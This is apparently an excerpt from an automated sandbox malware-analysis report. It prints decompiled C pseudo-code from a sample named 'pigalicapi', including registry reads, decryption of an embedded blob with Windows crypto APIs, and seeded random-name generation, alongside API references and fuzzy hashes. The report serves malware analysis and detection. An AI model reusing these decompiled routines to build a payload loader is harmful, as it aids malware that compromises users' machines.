                                                                                                                                                                                                                                                    									_v13 = 1;
                                                                                                                                                                                                                                                    									_v8 = _v40;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L16:
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                                    0x00ec8256
                                                                                                                                                                                                                                                    0x00ec8261
                                                                                                                                                                                                                                                    0x00ec8285
                                                                                                                                                                                                                                                    0x00ec828f
                                                                                                                                                                                                                                                    0x00ec8292
                                                                                                                                                                                                                                                    0x00ec8296
                                                                                                                                                                                                                                                    0x00ec82b1
                                                                                                                                                                                                                                                    0x00ec82b6
                                                                                                                                                                                                                                                    0x00ec82b9
                                                                                                                                                                                                                                                    0x00ec82bf
                                                                                                                                                                                                                                                    0x00ec82d6
                                                                                                                                                                                                                                                    0x00ec82db
                                                                                                                                                                                                                                                    0x00ec82de
                                                                                                                                                                                                                                                    0x00ec82e5
                                                                                                                                                                                                                                                    0x00ec82e7
                                                                                                                                                                                                                                                    0x00ec82ed
                                                                                                                                                                                                                                                    0x00ec82fb
                                                                                                                                                                                                                                                    0x00ec8306
                                                                                                                                                                                                                                                    0x00ec830d
                                                                                                                                                                                                                                                    0x00ec8318
                                                                                                                                                                                                                                                    0x00ec832e
                                                                                                                                                                                                                                                    0x00ec8333
                                                                                                                                                                                                                                                    0x00ec8336
                                                                                                                                                                                                                                                    0x00ec833d
                                                                                                                                                                                                                                                    0x00ec833f
                                                                                                                                                                                                                                                    0x00ec8346
                                                                                                                                                                                                                                                    0x00ec8346
                                                                                                                                                                                                                                                    0x00ec834f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec835a
                                                                                                                                                                                                                                                    0x00ec830d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec82e5
                                                                                                                                                                                                                                                    0x00ec8296
                                                                                                                                                                                                                                                    0x00ec835f
                                                                                                                                                                                                                                                    0x00ec8365

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000004,-->), ref: 00EC8300
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC80D8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                                    • String ID: -->$<!--
                                                                                                                                                                                                                                                    • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                    • Opcode ID: 82b80c6dd451cadb51c949d5d2fd0ffac1b558b9ed345c0ff95a77521156c388
                                                                                                                                                                                                                                                    • Instruction ID: e806d26468e55b5e1d673fe35396296a9533162d8558726a8b7ed44a679e18b0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82b80c6dd451cadb51c949d5d2fd0ffac1b558b9ed345c0ff95a77521156c388
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33314A70900289DFDF04CFA8CB44BEEBBB1AB48308F14A95ED415B7241DB769A45CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00ECA400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				int _v20;
                                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                                    				long _t27;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                    					_v12 = 0x80000001;
                                                                                                                                                                                                                                                    					if(( *0xed435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_v12 = 0x80000002;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                    					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                    					if(_t25 == 0) {
                                                                                                                                                                                                                                                    						_v20 = _a16;
                                                                                                                                                                                                                                                    						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                    						if(_t27 == 0) {
                                                                                                                                                                                                                                                    							_v8 = _v20;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                    0x00eca406
                                                                                                                                                                                                                                                    0x00eca411
                                                                                                                                                                                                                                                    0x00eca429
                                                                                                                                                                                                                                                    0x00eca439
                                                                                                                                                                                                                                                    0x00eca43b
                                                                                                                                                                                                                                                    0x00eca43b
                                                                                                                                                                                                                                                    0x00eca442
                                                                                                                                                                                                                                                    0x00eca45c
                                                                                                                                                                                                                                                    0x00eca464
                                                                                                                                                                                                                                                    0x00eca469
                                                                                                                                                                                                                                                    0x00eca480
                                                                                                                                                                                                                                                    0x00eca488
                                                                                                                                                                                                                                                    0x00eca48d
                                                                                                                                                                                                                                                    0x00eca48d
                                                                                                                                                                                                                                                    0x00eca494
                                                                                                                                                                                                                                                    0x00eca494
                                                                                                                                                                                                                                                    0x00eca464
                                                                                                                                                                                                                                                    0x00eca4a0

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 00ECA45C
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ECA480
                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 00ECA494
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                                                                                    • Opcode ID: 7da09b1e1d7e4f772411217ec1fda70352966150606d892cbd300f0a9bc9c4d1
                                                                                                                                                                                                                                                    • Instruction ID: ebad863f092f27fd22f0d98bb49739e8d3a7a556c33cb3e614ad0e406cd7c38f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7da09b1e1d7e4f772411217ec1fda70352966150606d892cbd300f0a9bc9c4d1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50116D70A0020DEFDB29DFA5C948FEE77B8FB44308F14846CE924A7280D3B59A56CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC8090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr* _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				int _v48;
                                                                                                                                                                                                                                                    				long _v52;
                                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                                                    				void* _t93;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v16 = _a8;
                                                                                                                                                                                                                                                    					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    					_v12 = _t71;
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_t73 = E00EC1390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                    						_v20 = _t73;
                                                                                                                                                                                                                                                    						if(_v20 != 0) {
                                                                                                                                                                                                                                                    							_v24 = _v12;
                                                                                                                                                                                                                                                    							_v28 = _v20;
                                                                                                                                                                                                                                                    							_v32 = E00EC87B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                    							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                    								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                    								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                    								_v36 = E00EC16F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                    								if(_v36 == _v44) {
                                                                                                                                                                                                                                                    									E00EC8630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                    									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                    									E00EC8630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                    									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                    									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                    									_t91 = E00EC8A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48,  &E00ED3410, 0x254); // executed
                                                                                                                                                                                                                                                    									if(_t91 != 0) {
                                                                                                                                                                                                                                                    										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    										 *_a12 = _t93;
                                                                                                                                                                                                                                                    										if( *_a12 != 0) {
                                                                                                                                                                                                                                                    											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                    											E00EC7B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                    											 *_a16 = _v52;
                                                                                                                                                                                                                                                    											_v8 = _v52;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_v8 == 0) {
                                                                                                                                                                                                                                                    							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                                    0x00ec8096
                                                                                                                                                                                                                                                    0x00ec80a1
                                                                                                                                                                                                                                                    0x00ec8246
                                                                                                                                                                                                                                                    0x00ec824c
                                                                                                                                                                                                                                                    0x00ec80c5
                                                                                                                                                                                                                                                    0x00ec80c8
                                                                                                                                                                                                                                                    0x00ec80d8
                                                                                                                                                                                                                                                    0x00ec80de
                                                                                                                                                                                                                                                    0x00ec80e5
                                                                                                                                                                                                                                                    0x00ec80fb
                                                                                                                                                                                                                                                    0x00ec8103
                                                                                                                                                                                                                                                    0x00ec810a
                                                                                                                                                                                                                                                    0x00ec8113
                                                                                                                                                                                                                                                    0x00ec8119
                                                                                                                                                                                                                                                    0x00ec812d
                                                                                                                                                                                                                                                    0x00ec8134
                                                                                                                                                                                                                                                    0x00ec8140
                                                                                                                                                                                                                                                    0x00ec8149
                                                                                                                                                                                                                                                    0x00ec8162
                                                                                                                                                                                                                                                    0x00ec816b
                                                                                                                                                                                                                                                    0x00ec817e
                                                                                                                                                                                                                                                    0x00ec818c
                                                                                                                                                                                                                                                    0x00ec819e
                                                                                                                                                                                                                                                    0x00ec81b1
                                                                                                                                                                                                                                                    0x00ec81d3
                                                                                                                                                                                                                                                    0x00ec81d8
                                                                                                                                                                                                                                                    0x00ec81e2
                                                                                                                                                                                                                                                    0x00ec81f1
                                                                                                                                                                                                                                                    0x00ec81fa
                                                                                                                                                                                                                                                    0x00ec8202
                                                                                                                                                                                                                                                    0x00ec820e
                                                                                                                                                                                                                                                    0x00ec8219
                                                                                                                                                                                                                                                    0x00ec8227
                                                                                                                                                                                                                                                    0x00ec822c
                                                                                                                                                                                                                                                    0x00ec822c
                                                                                                                                                                                                                                                    0x00ec8202
                                                                                                                                                                                                                                                    0x00ec81e2
                                                                                                                                                                                                                                                    0x00ec816b
                                                                                                                                                                                                                                                    0x00ec8134
                                                                                                                                                                                                                                                    0x00ec8233
                                                                                                                                                                                                                                                    0x00ec8240
                                                                                                                                                                                                                                                    0x00ec8240
                                                                                                                                                                                                                                                    0x00ec8233
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec80e5

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC80D8
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC8240
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC8AD3
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: GetLastError.KERNEL32 ref: 00EC8ADD
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8B0C
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 00EC8B37
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC8B5E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00EC8B7A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8B87
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8B91
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8B9D
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00EC81F1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 142027497-0
                                                                                                                                                                                                                                                    • Opcode ID: 0467942bc93528b5ecc6ebdce6d4bee562b3589628ceecf75a10e729897e06a8
                                                                                                                                                                                                                                                    • Instruction ID: 2033ba009bd352f1118eb8e51fed97401d721a677aae85799cdb9b18d03476a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0467942bc93528b5ecc6ebdce6d4bee562b3589628ceecf75a10e729897e06a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 545117B4E00209EFDB18DF98DA95FAEB7B5BB48304F109159E904B7381D731AE45CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                    			E00EC5930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                                    				void _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                    					E00EC7B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                    					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                    					asm("movsw");
                                                                                                                                                                                                                                                    					asm("movsb");
                                                                                                                                                                                                                                                    					_v56 = 0;
                                                                                                                                                                                                                                                    					while(_v56 < _a12) {
                                                                                                                                                                                                                                                    						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                    						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                    						if(_v56 == 0) {
                                                                                                                                                                                                                                                    							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                    						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                    0x00ec5938
                                                                                                                                                                                                                                                    0x00ec5943
                                                                                                                                                                                                                                                    0x00ec5971
                                                                                                                                                                                                                                                    0x00ec5986
                                                                                                                                                                                                                                                    0x00ec5988
                                                                                                                                                                                                                                                    0x00ec598a
                                                                                                                                                                                                                                                    0x00ec598b
                                                                                                                                                                                                                                                    0x00ec599d
                                                                                                                                                                                                                                                    0x00ec59c6
                                                                                                                                                                                                                                                    0x00ec59d6
                                                                                                                                                                                                                                                    0x00ec59dc
                                                                                                                                                                                                                                                    0x00ec59e2
                                                                                                                                                                                                                                                    0x00ec59e2
                                                                                                                                                                                                                                                    0x00ec59ee
                                                                                                                                                                                                                                                    0x00ec599a
                                                                                                                                                                                                                                                    0x00ec599a
                                                                                                                                                                                                                                                    0x00ec599d
                                                                                                                                                                                                                                                    0x00ec59fb

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CharUpperA.USER32(00000000), ref: 00EC59E2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • abcdefghijklmnopqrstuvwxyz, xrefs: 00EC597E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CharUpper
                                                                                                                                                                                                                                                    • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                    • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                    • Opcode ID: 61fb27133cf1b59cc171ac49865e2159672d427eea4001d9967d514cca5b0c01
                                                                                                                                                                                                                                                    • Instruction ID: 8a394b82478249b1705f9596cb5cda87df1c3e7190fd2a6e87f6410954311685
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61fb27133cf1b59cc171ac49865e2159672d427eea4001d9967d514cca5b0c01
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB214F31902108EBCF04CF98D684BDDB7B6FF85315F249599F81467340D376AA86CB40
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC9400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				char _v91;
                                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                                    				char _v220;
                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                    					_t56 = E00EC7B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                    					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                    					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                    					while(_v32 < _a12) {
                                                                                                                                                                                                                                                    						E00EC7D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                    						_t59 = E00EC8BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                    						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                    						_v40 = _t59;
                                                                                                                                                                                                                                                    						if(_v40 <= 0) {
                                                                                                                                                                                                                                                    							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v12 = _v220;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                    						E00EC9650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                    						E00EC7D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                    						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                    						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                    						_v91 = 0;
                                                                                                                                                                                                                                                    						CharUpperA( &_v92);
                                                                                                                                                                                                                                                    						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                    						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                    						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                                    0x00ec9409
                                                                                                                                                                                                                                                    0x00ec9414
                                                                                                                                                                                                                                                    0x00ec943d
                                                                                                                                                                                                                                                    0x00ec9442
                                                                                                                                                                                                                                                    0x00ec9451
                                                                                                                                                                                                                                                    0x00ec9454
                                                                                                                                                                                                                                                    0x00ec9466
                                                                                                                                                                                                                                                    0x00ec9480
                                                                                                                                                                                                                                                    0x00ec949a
                                                                                                                                                                                                                                                    0x00ec949f
                                                                                                                                                                                                                                                    0x00ec94a2
                                                                                                                                                                                                                                                    0x00ec94a9
                                                                                                                                                                                                                                                    0x00ec94bf
                                                                                                                                                                                                                                                    0x00ec94ab
                                                                                                                                                                                                                                                    0x00ec94b1
                                                                                                                                                                                                                                                    0x00ec94b1
                                                                                                                                                                                                                                                    0x00ec94d1
                                                                                                                                                                                                                                                    0x00ec94ed
                                                                                                                                                                                                                                                    0x00ec94fd
                                                                                                                                                                                                                                                    0x00ec9502
                                                                                                                                                                                                                                                    0x00ec9513
                                                                                                                                                                                                                                                    0x00ec9519
                                                                                                                                                                                                                                                    0x00ec9521
                                                                                                                                                                                                                                                    0x00ec9533
                                                                                                                                                                                                                                                    0x00ec953c
                                                                                                                                                                                                                                                    0x00ec9545
                                                                                                                                                                                                                                                    0x00ec9460
                                                                                                                                                                                                                                                    0x00ec9463
                                                                                                                                                                                                                                                    0x00ec9463
                                                                                                                                                                                                                                                    0x00ec9466
                                                                                                                                                                                                                                                    0x00ec9553

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC8BFF
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: GetLastError.KERNEL32 ref: 00EC8C09
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8C38
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00EC8C59
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00EC8C71
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 00EC8C99
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00EC8CC1
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 00EC8CD5
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8CE1
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00EC9513
                                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00EC9521
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2710640451-0
                                                                                                                                                                                                                                                    • Opcode ID: 36532ad3e98ce8bb18ce711f6cd9fb7a22119694dde10779604a347da34f3383
                                                                                                                                                                                                                                                    • Instruction ID: 078bb3a8231d11fae05568e250c2f00c89ef8be1913c4c26e697f670751e32fb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36532ad3e98ce8bb18ce711f6cd9fb7a22119694dde10779604a347da34f3383
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B24107B1D00208EBDB08DF94C985FEEBBB5EF58304F108159E515BB282E735AA46CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 00EC4C19
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00EC4C49
